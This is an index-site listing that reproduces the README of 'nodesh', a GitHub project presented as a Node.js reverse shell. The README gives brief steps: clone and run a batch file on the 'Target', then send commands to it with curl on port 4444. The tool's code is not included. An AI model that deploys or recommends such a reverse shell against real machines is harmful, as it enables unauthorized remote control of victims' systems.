An open API service indexing awesome lists of open source software.

https://github.com/miguelzacca/nodesh

Nodejs reverse shell
https://github.com/miguelzacca/nodesh

Last synced: 2 months ago
JSON representation

Nodejs reverse shell

Awesome Lists containing this project

README

        

# nodesh

Nodejs reverse shell.

## Use

Target:

```bash
git clone https://github.com/miguelzacca/nodesh.git
./nodesh/nodesh.bat
```

## Controller (curl or others, ex: Postman):

curl:

```bash
curl :4444/run --json '{"cmd":""}'
```